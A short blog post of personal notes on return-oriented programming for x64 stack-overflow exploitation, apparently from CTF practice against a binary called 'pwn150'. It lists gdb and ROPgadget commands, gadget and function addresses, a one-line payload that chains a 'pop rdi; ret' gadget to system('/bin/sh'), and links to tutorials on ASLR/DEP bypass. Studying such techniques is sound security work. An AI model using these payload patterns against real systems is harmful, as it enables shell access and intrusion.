Press "Enter" to skip to content

ROP Notes

system:
p system
4008a8
6008a8

bin/sh
gdb binary > start > find sh
or
elf.get_section_by_name('.dynsym').header['sh_addr']

pop rdi
ret
ROPgadget --binary ./pwn150 --only "pop|ret"
0x400883

Reference:
basic ROP:
http://www.cnblogs.com/0xJDchen/p/6175651.html

ROP x64:
http://yunnigu.dropsec.xyz/2016/11/21/pwn%E5%AD%A6%E4%B9%A0rop%E4%B9%8Bx64%E7%AF%87/
Main point:
payload = "\x00"*136 + p64(pop_pop_call_addr) + p64(system_addr) + p64(binsh_addr)
pop rdi; ret

POP POP POP , WRITE .BSS:
http://yunnigu.dropsec.xyz/2016/11/19/pwn%E5%AD%A6%E4%B9%A0%E4%B9%8BDynELF%E7%9A%84%E4%BD%BF%E7%94%A8/

return to dl (bypass aslr+dep):
https://zhuanlan.zhihu.com/p/23255727

x64 provide libc:
http://bobao.360.cn/learning/detail/3300.html

Comments

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *